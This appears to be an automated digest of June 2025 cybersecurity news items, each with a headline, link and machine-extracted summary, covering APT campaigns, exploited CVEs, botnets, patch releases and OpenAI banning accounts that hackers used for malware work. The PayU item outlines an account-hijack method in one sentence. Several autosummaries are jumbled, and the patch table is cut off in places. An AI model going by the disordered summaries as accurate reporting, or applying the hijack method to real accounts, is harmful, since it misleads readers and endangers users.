Flight data of US customers is being sold by several airlines through a joint data broker sending contracts to ICE and CBP. "

Autosummary: Delta, Southwest, United, Lufthansa, Air France, American Airlines, Air Canada, Alaska Airlines, and JetBlue all have seats on the ARC board. "


Smashing Security podcast #421: Toothpick flirts, Google leaks, and ICE ICE scammers

financial
2025-06-11 https://grahamcluley.com/smashing-security-podcast-421/
What do a sleazy nightclub carpet, Google’s gaping privacy hole, and an international student conned by fake ICE agents have in common? This week’s episode of the "Smashing Security" podcast obviously. Graham explains how a Singaporean bug-hunter cracked Google’s defences and could brute-force your full phone number. Meanwhile, Carole dives into a chilling scam where ICE impersonators used fear, spoofed numbers, and... Apple gift cards to extort terrified migrants. Plus: Nazis, door safety, and the age-old struggle of telling Ralph Fiennes from Liam Neeson. All this and more is discussed in the latest edition of the award-winning "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault. "

Autosummary: Hosts: Graham Cluley: @grahamcluley.com @[email protected] Carole Theriault: @caroletheriault Episode links: Sponsored by: Drata – The world’s most advanced Trust Management platform – making risk and compliance management accessible, continuous, and 10x more automated than ever before. "


Cybersecurity jobs available right now: June 10, 2025

ciber
2025-06-10 https://www.helpnetsecurity.com/2025/06/10/cybersecurity-jobs-available-right-now-june-10-2025/

The post Cybersecurity jobs available right now: June 10, 2025 appeared first on Help Net Security.

"

Autosummary: Automation tester (Infosec) – Vulnerability management WTW | India | On-site – View job details As an Automation tester (Infosec) – Vulnerability management, you will create, maintain, and execute appropriate security testing processes to enable timely detection, risk-based prioritization, and co-ordinate the remediation of security testing findings. Senior Network Security Engineer – F5/Firewall Intertec Systems | UAE | On-site – View job details As a Senior Network Security Engineer – F5/Firewall, you will engage in planning, scheduling, and implementing network upgrades, implementations, and migrations for clients in a timely manner and during times that will have the least impact on the users of the affected systems. Manager, Cloud Security Engineer Lead Pfizer | Ireland | Hybrid – View job details As a Manager, Cloud Security Engineer Lead, you will lead and manage engineers in designing, developing, and maintaining cloud-native security solutions for enhancements and new services to protect Pfizer cloud infrastructure. "


Rare Werewolf APT Uses Legitimate Software in Attacks on Hundreds of Russian Enterprises

rusia-ucrania
2025-06-10 https://thehackernews.com/2025/06/rare-werewolf-apt-uses-legitimate.html
The threat actor known as Rare Werewolf (formerly Rare Wolf) has been linked to a series of cyber attacks targeting Russia and the Commonwealth of Independent States (CIS) countries. "A distinctive feature of this threat is that the attackers favor using legitimate third-party software over developing their own malicious binaries," Kaspersky said. "The malicious functionality of the campaign "

Autosummary: According to BI.ZONE, the threat actor obtains initial access using phishing emails, leveraging the foothold to steal documents, Telegram messenger data, and drop tools like Mipko Employee Monitor, WebBrowserPassView, and Defender Control to interact with the infected system, harvest passwords, and disable antivirus software. "


CISA Adds Erlang SSH and Roundcube Flaws to Known Exploited Vulnerabilities Catalog

exploits
2025-06-10 https://thehackernews.com/2025/06/cisa-adds-erlang-ssh-and-roundcube.html
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added two critical security flaws impacting Erlang/Open Telecom Platform (OTP) SSH and Roundcube to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerabilities in question are listed below - CVE-2025-32433 (CVSS score: 10.0) - A missing authentication for a critical "

Autosummary: But because the endpoint checks for a valid token linked to a hard-coded email address ("commerce.pro@payu[.]in") and there exists another REST API to generate an authentication token for a given email ("/payu/v1/generate-user-token"), an attacker could exploit this behavior to obtain the token corresponding to "commerce.pro@payu[.]in" and send a request to "/payu/v1/get-shipping-cost" to hijack any account. "


Threat landscape for industrial automation systems. Regions, Q1 2025

industry
2025-06-10 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-regions-q1-2025/
The internet ranks first among threat sources in all regions. The problem is particularly relevant to Africa, South-East Asia, South Asia and Russia. "

Autosummary: The region had significantly higher, compared to the global average, percentages of ICS computers on which the following categories of malicious objects were blocked: Worms — 2.8 times higher; Viruses — 2.5 times higher; Spyware — 1.7 times higher; Ransomware — 1.6 times higher; Web miners — 1.5 times higher; Malicious programs targeting AutoCAD — 1.5 times higher; Malicious scripts and phishing pages — 1.4 times higher; Malicious documents — 1.3 times higher. The greatest differences in regional percentages compared to the global averages were observed for the following threat categories: Ransomware — 1.9 times higher, second place among all regions; Worms — 1.5 times higher, third place among all regions; Spyware — 1.5 times higher, third place among all regions; Malicious documents — 1.5 times higher, third place among all regions; Malicious scripts and phishing pages — 1.3 times higher, third place among all regions; Viruses — 1.3 times higher. Comparative analysis. Threat categories. Compared to global averages, the region has a noticeably higher percentage of ICS computers on which the following threat categories were blocked: Web miners — by a factor of 1.4; Malicious documents — by a factor of 1.3; Spyware — by a factor of 1.2; Worms — by a factor of 1.2; Malicious scripts and phishing pages — by a factor of 1.1; Miners in the form of executable files for Windows — by a factor of 1.1. Comparative analysis. Threat categories. Compared to global averages, Southern Europe shows higher percentages of ICS computers on which the following threat categories were blocked: Malicious documents — by a factor of 2.2; Spyware — by a factor of 1.6; Ransomware — by a factor of 1.5; Malicious scripts and phishing pages — by a factor of 1.4.
Percentage of ICS computers on which the activity of malicious objects from various categories was blocked. Changes in the percentage of ICS computers on which malicious documents were blocked, Q1 2025. Malicious scripts and phishing pages. Attackers use malicious scripts to perform a broad range of tasks — from collecting data, tracking, and redirecting the user’s browser to a malicious web resource, to downloading various types of malware (such as spyware, programs for covert cryptocurrency mining, or ransomware) onto the system or into the user’s browser. This group includes Windows computers that serve one or several of the following purposes: Supervisory control and data acquisition (SCADA) servers; Building automation servers; Data storage (Historian) servers; Data gateways (OPC); Stationary workstations of engineers and operators; Mobile workstations of engineers and operators; Human machine interface (HMI); Computers used to manage technological and building automation networks; Computers of ICS/PLC programmers. Computers that share statistics with us belong to organizations from various industries. Comparative analysis. Threat categories. Compared to global averages, the region showed noticeably higher percentages of ICS computers on which the following threat categories were blocked: Web miners — by a factor of 1.3; Viruses — by a factor of 1.2; Malicious scripts and phishing pages — by a factor of 1.1; Worms — by a factor of 1.1. Threat sources. For all threat sources, the percentage of ICS computers in the region on which malicious objects were blocked exceeds the global average: Threats in network folders — by a factor of 2.3; Threats from email clients — by a factor of 1.4; Threats from removable media — by a factor of 1.4; Internet threats — by a factor of 1.2.
Compared to global averages, the region has significantly higher percentages of ICS computers affected by the following categories of malicious objects: AutoCAD malware — by a factor of 3.5; Ransomware — by a factor of 2; Viruses — by a factor of 1.9; Worms — by a factor of 1.1; Spyware — by a factor of 1.1. Changes in the percentage of ICS computers on which web miners were blocked, Q1 2025. Miners in the form of executable files for Windows. The top three regions by percentage of ICS computers on which miners in the form of executable files for Windows were blocked: Central Asia — 1.72%; Russia — 1.04%; Eastern Europe — 0.85%. In regional rankings in Q1 2025, Central Asia demonstrated the following results: First place by percentage of ICS computers on which miners in the form of executable files for Windows were blocked; Second place by percentage of ICS computers on which worms were blocked; Third place by percentage of ICS computers on which denylisted internet resources were blocked. In Q1 2025, East Asia ranked among all regions: First by percentage of ICS computers on which ransomware was blocked; Second by percentage of ICS computers on which AutoCAD malware was blocked; Third by percentage of ICS computers on which viruses were blocked. Comparative analysis. Threat categories. Compared to global averages, Latin America shows higher percentages of ICS computers on which the following threat categories were blocked: Malicious documents — by a factor of 1.8; Malicious scripts and phishing pages — by a factor of 1.3; Web miners — by a factor of 1.3.
Compared to global figures, the region has significantly higher percentages of ICS computers on which the following categories of malicious objects were blocked: Malicious programs for AutoCAD — 7.8 times higher; Viruses — 5.7 times higher; Web miners — 1.5 times higher; Spyware — 1.4 times higher. Regions ranked by percentage of ICS computers on which malicious objects were blocked, Q1 2025. All regions ranked by percentage of ICS computers on which malicious objects were blocked in the first quarter can be divided into three groups. Over 25%: Africa — 29.6%; South-East Asia — 29.1%. In the regions within this group, OT computers are generally overexposed to cyberthreats. In Q1 2025, the percentage of ICS computers on which malicious objects were blocked increased in the following sectors and OT infrastructures: Biometrics — by a factor of 1.1; Construction — by a factor of 1.1; Manufacturing — by a factor of 1.1; Building automation. The region’s percentage figures exceeded global averages for all threat sources: Removable media threats — by a factor of 4.7; Email threats — by a factor of 1.4; Internet threats — by a factor of 1.3; Threats in network folders — by a factor of 1.1. Quarterly changes and trends. Threat categories. In Q1 2025, Southern Europe ranks first among all regions by growth in the percentage of ICS computers on which the following threat categories were blocked: Spyware; Worms; Malware for AutoCAD. 20–25%: Central Asia — 24.2%; Middle East — 24.1%; Eastern Europe — 21.8%; South Asia — 21.0%; East Asia — 21.0%; Latin America — 21.0%; Southern Europe — 20.8%. The regions within this group may face specific challenges in isolating their OT infrastructure from potential cyberthreats.
Kill chain example: the use of legitimate mining tools in cryptomining attacks. Ransomware. Top three regions by percentage of ICS computers on which ransomware was blocked: East Asia — 0.32%; Middle East — 0.30%; Africa — 0.25%. The list is used to block primarily the following threats on ICS computers: Known malicious URLs and IP addresses used by attackers to host payloads and configurations; Suspicious (untrusted) web resources offering entertainment or gaming content, often abused to deliver unwanted software, cryptocurrency miners, or malicious scripts; CDN nodes leveraged by threat actors to deliver malicious scripts via legitimate websites; File-sharing and data exchange services, including public repositories, that are often used to host next-stage payloads and configurations. Threat sources. In Q1 2025, Central Asia exceeded global averages in the percentage of ICS computers on which the following malicious objects were blocked: Threats from removable media — by a factor of 1.5; Threats in network folders — by a factor of 1.1. Regions ranked by percentage of ICS computers on which threats were blocked when connecting removable media, Q1 2025. Frequent attempts to infect protected systems when connecting USB drives may indicate: low connectivity in the organization’s OT network (a large number of remote sites not linked to the main network by high-speed and reliable communication lines); low level of enterprise IT infrastructure development (the absence of other standard internal systems for file storage and transfer); the presence of a significant unprotected part of the infrastructure that acts as a source of initial infection for removable drives; poor cybersecurity culture overall. Viruses. Top three regions by percentage of ICS computers on which viruses were blocked: South-East Asia, a clear leader — 8.68%; Africa — 3.87%; East Asia — 2.85%.
Regions ranked by percentage of ICS computers on which malicious scripts and phishing pages were blocked, Q1 2025. Threat actors use malicious scripts for a wide range of purposes — from collecting data, tracking, and redirecting a user’s browser to a malicious web resource, to delivering a variety of malware (including spyware, malware for covert cryptocurrency mining or ransomware) to the user’s system or browser. AutoCAD malware. The top three regions ranked by percentage of ICS computers on which malicious AutoCAD programs were blocked are the same regions that top the virus ranking: South-East Asia — 2.65%; East Asia — 1.19%; Africa — 0.51%. In Q1 2025, Africa ranked first among all regions by the percentage of ICS computers on which the following categories of malicious objects were blocked: Denylisted internet resources; Spyware; Worms; Web miners. Comparative analysis. Threat categories. Compared to global averages, Russia has higher percentages of ICS computers on which the following threats were blocked: Denylisted internet resources — by a factor of 1.1; Miners in the form of executable files for Windows. Web miners running in browsers. The top three regions by percentage of ICS computers on which web miners running in browsers were blocked were: Africa — 0.81%; South-East Asia — 0.80%; Eastern Europe — 0.76%. Threat sources. In the Middle East, the percentages of ICS computers on which the following threats were blocked significantly exceed global averages: Email threats — 1.8 times higher; Threats on removable media — 1.7 times higher. Threat sources. In Q1 2025, the percentage of ICS computers on which malicious objects were blocked increased for two threat sources: Internet threats — by a factor of 1.1; Email threats — by a factor of 1.1.
Compared to the corresponding global averages, the following industries in East Asia showed higher percentages of ICS computers on which malicious objects were blocked: Electric power sector — by a factor of 1.3; Construction — by a factor of 1.1; Manufacturing — by a factor of 1.1. In Q1 2025, the top three regions by percentage of ICS computers on which spyware was blocked included: Africa — 7.05%; Southern Europe — 6.52%; Middle East — 6.25%. Other indicators that increased were the percentages of ICS computers on which the following threats were blocked: Worms — by a factor of 1.2; Miners in the form of executable files for Windows — by a factor of 1.2; Malicious documents — by a factor of 1.1. Changes in the percentage of attacked ICS computers in Q1 2025. Threat sources. The internet (access to malicious or compromised web resources; malicious content distributed via messengers, cloud data storage and processing services, and CDNs), email clients (phishing emails), and removable media remain the primary sources of threats to computers in the OT infrastructure of organizations. Top three regions by percentage of ICS computers affected by threats in network folders in Q1 2025: East Asia, the undisputed leader — 0.27%; South-East Asia — 0.16%; South Asia — 0.11%. The percentage of ICS computers on which malicious objects were blocked exceeds global averages most significantly in the following industries: Electric power sector — by a factor of 1.2; Construction — by a factor of 1.1; Building automation — by a factor of 1.1. Quarterly changes and trends. Threat categories. The highest increases over the previous quarter were observed in Q1 2025 in the percentage of ICS computers on which the following categories of malicious objects were blocked: Ransomware — by a factor of 1.4, with East Asia ranking first among regions based on growth in this category.
Regions ranked by percentage of ICS computers on which viruses were blocked, Q1 2025. Apparently, high percentage figures for self-propagating malware and threats in network folders indicate that a significant part of the infrastructure is unprotected, becoming a source of secondary malware infections (malware propagation), and point to a lack of segmentation in enterprise networks in the region. Quarterly changes and trends. Threat categories. The largest increases from the previous quarter in Australia and New Zealand were recorded for percentages of ICS computers on which the following categories of threats were blocked: Malicious scripts and phishing pages — by a factor of 1.1, second place among regions by growth in this category. Africa. Current threats. Africa has for many years topped the ranking of regions by percentage of ICS computers on which malicious objects were blocked, with figures significantly exceeding the global averages – in Q1 2025, the percentage was 1.4 times higher than the global figure. "


Five plead guilty to laundering $36 million stolen in investment scams

financial
2025-06-10 https://www.bleepingcomputer.com/news/security/five-plead-guilty-to-laundering-36-million-stolen-in-investment-scams/
Five men from China, the United States, and Turkey pleaded guilty to their involvement in an international crime ring and laundering nearly $37 million stolen from U.S. victims in cryptocurrency investment scams carried out from Cambodia. [...] "

Autosummary: Accomplices living abroad reached out to targets in the United States via unsolicited social media, phone calls, text messages, and online dating services to gain their trust, promoting fraudulent digital asset investments and falsely claiming that the victims' funds' value increased after they tricked them into investing, when, in fact, their money was stolen. "


44% of people encounter a mobile scam every single day, Malwarebytes finds

financial exploits
2025-06-10 https://www.malwarebytes.com/blog/scams/2025/06/44-of-people-encounter-a-mobile-scam-every-single-day-malwarebytes-finds
A mobile scam finds most people at least once a week, new Malwarebytes research reveals. The financial and emotional consequences are dire. "

Autosummary: With the launch of our free, AI-powered digital safety companion Scam Guard, users can review any concerning text, email, phone number, link, image, or online message and receive on-the-spot guidance to avert and report scams. By surveying 1,300 people over the age of 18 in the US, UK, Austria, Germany, and Switzerland, Malwarebytes can reveal a mobile reality full of tension: high concern, low action, and increasingly blurred lines between what’s safe and what’s not. "


Google bug allowed phone number of almost any user to be discovered

exploits
2025-06-10 https://www.malwarebytes.com/blog/news/2025/06/google-bug-allowed-phone-number-of-almost-any-user-to-be-discovered
Google has fixed a vulnerability in its account recovery flow which could have allowed attackers to find linked phone numbers. "

Autosummary: Nonetheless, a weakness allowing an attacker to trace phone numbers to Google accounts like this creates a massive risk for phishing and SIM-swapping attacks—especially since the majority of users will have their primary phone number as their account recovery number. "


The Hidden Threat in Your Stack: Why Non-Human Identity Management is the Next Cybersecurity Frontier

ciber
2025-06-10 https://thehackernews.com/2025/06/the-hidden-threat-in-your-stack-why-non.html
Modern enterprise networks are highly complex environments that rely on hundreds of apps and infrastructure services. These systems need to interact securely and efficiently without constant human oversight, which is where non-human identities (NHIs) come in. NHIs — including application secrets, API keys, service accounts, and OAuth tokens — have exploded in recent years, thanks to an "

Autosummary: At the end of the day, non-human identities and human identities may have different characteristics and needs, but both require an end-to-end approach that protects them before, during, and after authentication. Those secrets, keys, and tokens are just as sensitive as the credentials used by humans, and in some cases, even more so, as they can provide adversaries with powerful access to specific applications and services if they're leaked. NHIs — including application secrets, API keys, service accounts, and OAuth tokens — have exploded in recent years, thanks to an ever-expanding array of apps and services that must work together and identify one another on the fly. How do we make sure we're managing those?" Final thoughts. Non-human identities are essential to businesses today, helping them automate processes, enable integrations, and ensure smooth operations. "


Mirai botnets exploit Wazuh RCE, Akamai warned

exploits
2025-06-10 https://securityaffairs.com/178830/malware/mirai-botnets-exploit-wazuh-rce-akamai-warned.html
Mirai botnets are exploiting CVE-2025-24016, a critical remote code execution flaw in Wazuh servers, Akamai warned. Akamai researchers warn that multiple Mirai botnets exploit the critical remote code execution vulnerability CVE-2025-24016 (CVSS score of 9.9) affecting Wazuh servers. Wazuh is an open-source security platform used for threat detection, intrusion detection, log data analysis, and compliance […] "

Autosummary: Mirai botnets are exploiting CVE-2025-24016, a critical remote code execution flaw in Wazuh servers, Akamai warned. The botnet also exploited other vulnerabilities, including Hadoop YARN, TP-Link AX21, and ZTE routers, using dynamic infrastructure to evade detection and spread rapidly. "


FIN6 Uses AWS-Hosted Fake Resumes on LinkedIn to Deliver More_eggs Malware

exploits
2025-06-10 https://thehackernews.com/2025/06/fin6-uses-aws-hosted-fake-resumes-on.html
The financially motivated threat actor known as FIN6 has been observed leveraging fake resumes hosted on Amazon Web Services (AWS) infrastructure to deliver a malware family called More_eggs. "By posing as job seekers and initiating conversations through platforms like LinkedIn and Indeed, the group builds rapport with recruiters before delivering phishing messages that lead to malware," the "

Autosummary: One of the malware's known customers is FIN6 (aka Camouflage Tempest, Gold Franklin, ITG08, Skeleton Spider, and TA4557), an e-crime crew that originally targeted point-of-sale (PoS) systems in the hospitality and retail sectors to steal payment card details and profit off them. "


Rust-based Myth Stealer Malware Spread via Fake Gaming Sites Targets Chrome, Firefox Users

exploits
2025-06-10 https://thehackernews.com/2025/06/rust-based-myth-stealer-malware-spread.html
Cybersecurity researchers have shed light on a previously undocumented Rust-based information stealer called Myth Stealer that's being propagated via fraudulent gaming websites. "Upon execution, the malware displays a fake window to appear legitimate while simultaneously decrypting and executing malicious code in the background," Trellix security researchers Niranjan Hegde, Vasantha Lakshmanan "

Autosummary: The findings also follow a report from Positive Technologies that multiple threat actors, including TA558, Blind Eagle, Aggah (aka Hagga), PhaseShifters (aka Angry Likho, Sticky Werewolf, and UAC-0050), UAC-0050, and PhantomControl, are using a crypter-as-a-service offering called Crypters And Tools to obfuscate files like Ande Loader. It's equipped to steal passwords, cookies, and autofill information from both Chromium- and Gecko-based browsers, such as Google Chrome, Microsoft Edge, Brave, Opera, Vivaldi, and Mozilla Firefox. "


U.S. CISA adds RoundCube Webmail and Erlang Erlang/OTP SSH server flaws to its Known Exploited Vulnerabilities catalog

exploits
2025-06-10 https://securityaffairs.com/178843/hacking/u-s-cisa-adds-roundcube-erlang-erlang-flaws-known-exploited-vulnerabilities-catalog.html
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds RoundCube Webmail and Erlang/OTP SSH server flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added RoundCube Webmail and Erlang/OTP SSH server flaws to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions for these flaws: The CVE-2025-32433 flaw is a […] "

Autosummary: Below are the descriptions for these flaws:
- CVE-2025-32433 (CVSS score of 10): Erlang/OTP SSH Server Missing Authentication for Critical Function Vulnerability
- CVE-2024-42009 (CVSS score of 9.3): RoundCube Webmail Cross-Site Scripting Vulnerability
The CVE-2025-32433 flaw is a critical issue that impacts older versions of Erlang/OTP, a toolkit used with the Erlang programming language.


New Secure Boot flaw lets attackers install bootkit malware, patch now

exploits
2025-06-10 https://www.bleepingcomputer.com/news/security/new-secure-boot-flaw-lets-attackers-install-bootkit-malware-patch-now/
Security researchers have disclosed a new Secure Boot bypass tracked as CVE-2025-3052 that can be used to turn off security on PCs and servers and install bootkit malware. [...]

Autosummary: "During the triage process, Microsoft determined that the issue did not affect just a single module as initially believed, but actually 14 different modules," explains Binarly.


Microsoft June 2025 Patch Tuesday fixes exploited zero-day, 66 flaws

exploits
2025-06-10 https://www.bleepingcomputer.com/news/microsoft/microsoft-june-2025-patch-tuesday-fixes-exploited-zero-day-66-flaws/
Today is Microsoft's June 2025 Patch Tuesday, which includes security updates for 66 flaws, including one actively exploited vulnerability and another that was publicly disclosed. [...]

Autosummary: The captured part of the patch table (Tag | CVE ID | CVE Title | Severity):
.NET and Visual Studio | CVE-2025-30399 | .NET and Visual Studio Remote Code Execution Vulnerability | Important
App Control for Business (WDAC) | CVE-2025-33069 | Windows App Control for Business Security Feature Bypass Vulnerability | Important
Microsoft AutoUpdate (MAU) | CVE-2025-47968 | Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability | Important
Microsoft Local Security Authority Server (lsasrv) | CVE-2025-33056 | Windows Local Security Authority (LSA) Denial of Service Vulnerability | Important
Microsoft Office | CVE-2025-47164 | Microsoft Office Remote Code Execution Vulnerability | Critical
Microsoft Office | CVE-2025-47167 | Microsoft Office Remote Code Execution Vulnerability | Critical
Microsoft Office | CVE-2025-47162 | Microsoft Office Remote Code Execution Vulnerability | Critical
Microsoft Office | CVE-2025-47173 | Microsoft Office Remote Code Execution Vulnerability | Important
Microsoft Office | CVE-2025-47953 | Microsoft Office Remote Code Execution Vulnerability | Critical
Microsoft Office Excel | CVE-2025-47165 | Microsoft Excel Remote Code Execution Vulnerability | Important
Microsoft Office Excel | CVE-2025-47174 | Microsoft Excel Remote Code Execution Vulnerability | Important
Microsoft Office Outlook | CVE-2025-47171 | Microsoft Outlook Remote Code Execution Vulnerability | Important
Microsoft Office Outlook | CVE-2025-47176 | Microsoft Outlook Remote Code Execution Vulnerability | Important
Microsoft Office PowerPoint | CVE-2025-47175 | Microsoft PowerPoint Remote Code Execution Vulnerability | Important
Microsoft Office SharePoint | CVE-2025-47172 | Microsoft SharePoint Server Remote Code Execution Vulnerability | Critical
Microsoft Office SharePoint | CVE-2025-47166 | Microsoft SharePoint Server Remote Code Execution Vulnerability | Important
Microsoft Office SharePoint | CVE-2025-47163 | Microsoft SharePoint Server Remote Code Execution Vulnerability | Important
Microsoft Office Word | CVE-2025-47170 | Microsoft Word Remote Code Execution Vulnerability | Important
Microsoft Office Word | CVE-2025-47957 | Microsoft Word Remote Code Execution Vulnerability | Important
Microsoft Office Word | CVE-2025-47169 | Microsoft Word Remote Code Execution Vulnerability | Important
Microsoft Office Word | CVE-2025-47168 | Microsoft Word Remote Code Execution Vulnerability | Important
Nuance Digital Engagement Platform | CVE-2025-47977 | Nuance Digital Engagement Platform […] (title and severity cut off; the source runs this row into the next one)
[tag and CVE ID cut off in the source] | Windows Shortcut Files Security Feature Bypass Vulnerability | Important
Windows SMB | CVE-2025-33073 | Windows SMB Client Elevation of Privilege Vulnerability | Important
Windows SMB | CVE-2025-32718 | Windows SMB Client Elevation of Privilege Vulnerability | Important
Windows Standards-Based Storage Management Service | CVE-2025-33068 | Windows Standards-Based Storage Management Service Denial of Service Vulnerability | Important
Windows Storage Management Provider | CVE-2025-32719 | Windows Storage Management Provider Information Disclosure Vulnerability | Important
Windows Storage Management Provider | CVE-2025-24065 | Windows Storage Management Provider Information Disclosure Vulnerability | Important
Windows Storage Management Provider | CVE-2025-24068 | Windows Storage Management Provider Information Disclosure Vulnerability | Important
Windows Storage Management Provider | CVE-2025-33055 | Windows Storage Management Provider Information Disclosure Vulnerability | Important
Windows Storage Management Provider | CVE-2025-24069 | Windows Storage Management Provider Information Disclosure Vulnerability | Important
Windows Storage Management Provider | CVE-2025-33060 | Windows Storage Management Provider Information Disclosure Vulnerability | Important
Windows Storage Management Provider | CVE-2025-33059 | Windows Storage Management Provider Information Disclosure Vulnerability | Important
Windows Storage Management Provider | CVE-2025-33062 | Windows Storage Management Provider Information Disclosure Vulnerability | Important
Windows Storage Management Provider | CVE-2025-33061 | Windows Storage Management Provider Information Disclosure Vulnerability | Important
Windows Storage Management Provider | CVE-2025-33058 | Windows Storage Management Provider Information Disclosure Vulnerability | Important
Windows Storage Management Provider | CVE-2025-32720 | Windows Storage Management Provider Information Disclosure Vulnerability | Important
Windows Storage Management Provider | CVE-2025-33065 | Windows Storage Management Provider Information Disclosure Vulnerability | Important
Windows Storage Management Provider | CVE-2025-33063 | Windows Storage Management Provider Information Disclosure Vulnerability | Important
Windows Storage Port Driver | CVE-2025-32722 | Windows Storage Port Driver Information Disclosure Vulnerability | Important
Windows Win32K - GRFX | CVE-2025-32712 | Win32k Elevation of Privilege Vulnerability | Important


Researchers Uncover 20+ Configuration Risks, Including Five CVEs, in Salesforce Industry Cloud

industry
2025-06-10 https://thehackernews.com/2025/06/researchers-uncover-20-configuration.html
Cybersecurity researchers have uncovered over 20 configuration-related risks affecting Salesforce Industry Cloud (aka Salesforce Industries), exposing sensitive data to unauthorized internal and external parties. The weaknesses affect various components like FlexCards, Data Mappers, Integration Procedures (IProcs), Data Packs, OmniOut, and OmniScript Saved Sessions. "Low-code platforms such as

Autosummary: Among the flaws: FlexCard does not enforce the "View Encrypted Data" permission, returning plaintext values for data that uses Classic Encryption (CVSS score: 7.5). CVE-2025-43701 (CVSS score: 7.5): if "Check Field Level Security" is not enabled for "Extract" and "Turbo Extract" Data Mappers, the "View Encrypted Data" permission check is not enforced, exposing cleartext values for the encrypted fields to users with access to a given record. CVE-2025-43698 (CVSS score: N/A): […]


Texas Department of Transportation (TxDOT) data breach exposes 300,000 crash reports

financial
2025-06-10 https://securityaffairs.com/178861/data-breach/txdot-data-breach-exposes-300000-crash-reports.html
Hackers breached the Texas Department of Transportation (TxDOT) and stole 300,000 crash reports containing personal data from its Crash Records Information System (CRIS). The Texas Department of Transportation is a state agency that manages Texas's transportation systems. It […]

Autosummary: Compromised personal information in crash reports may include first and last names, mailing and/or physical addresses, driver's license numbers, license plate numbers, vehicle make and model, car insurance policy numbers, and other information such as injuries sustained and a narrative description of the crash.


SAP June 2025 Security Patch Day fixed critical NetWeaver bug

exploits
2025-06-10 https://securityaffairs.com/178851/security/sap-june-2025-security-patch-day-fixed-critical-netweaver-bug.html
SAP fixed a critical NetWeaver flaw that let attackers bypass authorization and escalate privileges. The June 2025 Security Patch Day addressed the vulnerability, tracked as CVE-2025-42989 (CVSS score of 9.6), which allows threat actors to bypass authorization checks and escalate their privileges. “RFC inbound processing does not perform […]


At least four dead in Colombia attacks, local media reports

latam
2025-06-10 https://www.bbc.com/news/articles/cdd2vn0j3gvo
The attacks come as the country grapples with an escalating security crisis.


DanaBot malware operators exposed via C2 bug added in 2022

exploits
2025-06-10 https://www.bleepingcomputer.com/news/security/danabot-malware-operators-exposed-via-c2-bug-added-in-2022/
A vulnerability in the DanaBot malware operation, introduced in a June 2022 update, led to the identification and indictment of its operators and the dismantling of the operation in a recent law enforcement action. [...]


Balancing cybersecurity and client experience for high-net-worth clients

ciber
2025-06-09 https://www.helpnetsecurity.com/2025/06/09/renana-friedlich-barsky-lpl-financial-wealth-management-cybersecurity/

In this Help Net Security interview, Renana Friedlich-Barsky, EVP and CISO at LPL Financial, discusses how threat actors are targeting high-net-worth clients and exploiting digital touchpoints in wealth management. She explains why firms must embed security from the start to protect sensitive assets and ensure seamless, secure client experiences. How are threat actors evolving their tactics to target high-net-worth clients or exploit digital touchpoints in wealth management platforms? Threat actors are becoming more targeted and … More

Autosummary: In this Help Net Security interview, Renana Friedlich-Barsky, EVP and CISO at LPL Financial, discusses how threat actors are targeting high-net-worth clients and exploiting digital touchpoints in wealth management. By demonstrating how strong security enhances brand reputation, customer confidence, and regulatory compliance, CISOs help shift the perception of cybersecurity from a cost center to a business enabler, driving security and sustainable digital transformation in wealth management.


CISOs, are you ready for cyber threats in biotech?

industry
2025-06-09 https://www.helpnetsecurity.com/2025/06/09/cyberbiosecurity-ciso-cyber-threats/

The threat landscape in the bioeconomy is different from what most CISOs are used to. It includes traditional risks like data breaches, but the consequences are more complex. A compromise of genomic databases, for example, does not just expose personal health data. It can also leak proprietary genetic sequences that represent years of research and investment. These are not just privacy violations; they are breaches that can cripple a business’s future R&D pipeline. One example … More

Autosummary: The threats are real, and the stakes are operational, reputational, and in some cases, biological. Strategies for CISOs: to reduce risk in the bioeconomy, CISOs need to start thinking about cybersecurity and biosecurity as a single, combined effort, not separate problems.


OpenAI Bans ChatGPT Accounts Used by Russian, Iranian and Chinese Hacker Groups

rusia-ucrania
2025-06-09 https://thehackernews.com/2025/06/openai-bans-chatgpt-accounts-used-by.html
OpenAI has revealed that it banned a set of ChatGPT accounts that were likely operated by Russian-speaking threat actors and two Chinese nation-state hacking groups to assist with malware development, social media automation, and research about U.S. satellite communications technologies, among other things. "The [Russian-speaking] actor used our models to assist with developing and refining

Autosummary: In addition, the China-linked clusters weaponized ChatGPT to work on a brute-force script that can break into FTP servers, research about using large-language models (LLMs) to automate penetration testing, and develop code to manage a fleet of Android devices to programmatically post or like content on social media platforms like Facebook, Instagram, TikTok, and X. Some of the other observed malicious activity clusters that harnessed ChatGPT in nefarious ways are listed below:
- A network, consistent with the North Korea IT worker scheme, that used OpenAI's models to drive deceptive employment campaigns by developing materials that could likely advance their fraudulent attempts to apply for IT, software engineering, and other remote jobs around the world
- Sneer Review, a likely China-origin activity that used OpenAI's models to bulk generate social media posts in English, Chinese, and Urdu on topics of geopolitical relevance to the country for sharing on Facebook, Reddit, TikTok, and X
- Operation High Five, a Philippines-origin activity that used OpenAI's models to generate bulk volumes of short comments in English and Taglish on topics related to politics and current events in the Philippines for sharing on Facebook and TikTok
- Operation VAGue Focus, a China-origin activity that used OpenAI's models to generate social media posts for sharing on X by posing as journalists and geopolitical analysts, asking questions about computer network attack and exploitation tools, and translating emails and messages from Chinese to English as part of suspected social engineering attempts


New Mirai botnet targets TBK DVRs by exploiting CVE-2024-3721

exploits
2025-06-09 https://securityaffairs.com/178779/malware/new-mirai-botnet-targets-tbk-dvrs-by-exploiting-cve-2024-3721.html
A new variant of the Mirai botnet exploits CVE-2024-3721 to target DVR systems, using a new infection method. Researchers from Russian cybersecurity firm Kaspersky discovered a new variant of the Mirai botnet that exploits a command injection vulnerability (CVE-2024-3721) in TBK DVR-4104 and DVR-4216 digital video recording devices. During a review of the logs in […]


BadBox 2.0 botnet infects millions of IoT devices worldwide, FBI warns

industry
2025-06-09 https://securityaffairs.com/178789/malware/badbox-2-0-botnet-infects-millions-of-iot-devices-worldwide-fbi-warns.html
BadBox 2.0 malware has infected millions of IoT devices globally, creating a botnet used for cyber criminal activities, the FBI warns. The FBI published a Public Service Announcement (PSA) to warn that cybercriminals are using the BADBOX 2.0 botnet to exploit IoT devices on home networks, like streaming devices, projectors, and infotainment systems, mostly made […]


